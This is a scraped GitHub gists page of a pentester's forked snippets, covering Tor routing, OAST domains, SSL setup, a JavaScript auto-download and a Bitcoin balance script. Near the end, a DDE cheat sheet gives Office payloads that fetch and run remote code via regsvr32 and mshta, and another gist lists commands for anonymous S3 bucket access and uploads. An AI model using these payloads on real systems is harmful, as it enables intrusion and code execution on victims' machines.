iptables -A OUTPUT -p icmp -j REJECT
iptables -t nat -A OUTPUT ! -o lo -p tcp -m owner --uid-owner $USER -m tcp -j REDIRECT --to-ports 9040
iptables -t nat -A OUTPUT ! -o lo -p udp -m owner --uid-owner $USER -m udp --dport 53 -j REDIRECT --to-ports 53
iptables -t filter -A OUTPUT -p tcp -m owner --uid-owner $USER -m tcp --dport 9040 -j ACCEPT
iptables -t filter -A OUTPUT -p udp -m owner --uid-owner $USER -m udp --dport 53 -j ACCEPT
iptables -t filter -A OUTPUT ! -o lo -m owner --uid-owner $USER -j DROP
CalfCrusher
/ Out of band interaction domains
Created
October 29, 2022 10:14
— forked from breakersall/Out of band interaction domains
External service interaction domains
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| interact.sh | |
| oast.pro | |
| oast.live | |
| oast.site | |
| oast.online | |
| oast.fun | |
| oast.me | |
| burpcollaborator.net | |
| oastify.com | |
| canarytokens.com |
CalfCrusher
/ route-traffic-through-tor-iptables.md
Created
October 25, 2022 18:33
— forked from jkullick/route-traffic-through-tor-iptables.md
Route all Traffic through Tor for specific User on Linux with IPTables
CalfCrusher
/ tor.sh
Created
October 25, 2022 18:31
— forked from DarthPumpkin/tor.sh
OS X shell script for routing all traffic through tor. Requires tor to be installed (brew install tor). Taken from https://kremalicious.com/simple-tor-setup-on-mac-os-x/, modified from http://leonid.shevtsov.me/en/an-easy-way-to-use-tor-on-os-x To stop using tor just terminate this script with Ctrl C
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # 'Wi-Fi' or 'Ethernet' or 'Display Ethernet' | |
| INTERFACE=Wi-Fi | |
| # Ask for the administrator password upfront | |
| sudo -v | |
| # Keep-alive: update existing `sudo` time stamp until finished | |
| while true; do sudo -n true; sleep 60; kill -0 "$$" || exit; done 2>/dev/null & |
CalfCrusher
/ route-all-traffic-through-tor.md
Created
October 25, 2022 18:30
— forked from numb95/route-all-traffic-through-tor.md
Route all internet traffic through Tor
CalfCrusher
/ readme.md
Created
October 22, 2022 00:33
— forked from sohlich/readme.md
Let's encrypt - generate SSL certificate manually via Cerbot DNS Challenge
Install Certbot
$ brew install certbot
CalfCrusher
/ readme.txt
Created
October 19, 2022 21:32
— forked from nathanqthai/readme.txt
simple tornado server with ssl
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| to generate example certs | |
| openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout host.key -out host.crt | |
| run server: | |
| chmod +x server.py | |
| ./server.py | |
| test server: | |
| openssl s_client -connect localhost:8888 |
CalfCrusher
/ automatic-download.html
Last active
October 14, 2022 16:39
Automatic Download of a file using Javascript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script type="text/javascript"> | |
| if (navigator.platform == 'Win32') { | |
| setTimeout(function () {window.location = 'https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe'; }, 2000) | |
| } | |
| </script> |
CalfCrusher
/ aws-s3-buckets-pentest.txt
Created
September 28, 2022 09:16
— forked from Anon-Exploiter/aws-s3-buckets-pentest.txt
Useful commands while testing s3 buckets!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| aws s3 ls s3://s3buckethere --no-sign-request ## Lists the file in the s3 bucket | |
| aws s3 cp s3://bucketname/filethere.txt . --no-sign-request ## Downloads `filethere.txt` from the s3 bucket in the current directory | |
| aws s3 cp test.txt s3://bucketname --no-sign-request ## Uploads `test.txt` from current directory to the s3 bucket | |
| aws s3api get-bucket-acl --bucket bucketname --no-sign-request ## Shows ACL (Access Control List) of the given bucket | |
| aws s3api get-object-acl --bucket bucketname --key fileons3bucket.ext --no-sign-request ## Shows ACL (Access Control List) of given object in the bucket |
CalfCrusher
/ btcbal.py
Created
September 25, 2022 09:03
— forked from lukem512/btcbal.py
Retrieve Bitcoin address balance from Blockchain API
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import sys | |
| import getopt | |
| import urllib2 | |
| from optparse import OptionParser | |
| def main(): | |
| # variables | |
| btcaddr = "" |
CalfCrusher
/ Macro-Less-Cheatsheet.md
Created
August 8, 2022 18:30
— forked from mgeeky/Macro-Less-Cheatsheet.md
Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet
- Using
regsvr32*.sct files technique:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || regsvr32 /s /n /u /i:http://192.168.56.101/empire2.sct scrobj.dll"
- Using
HTAfiles technique:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || mshta http://192.168.56.101/poc.hta"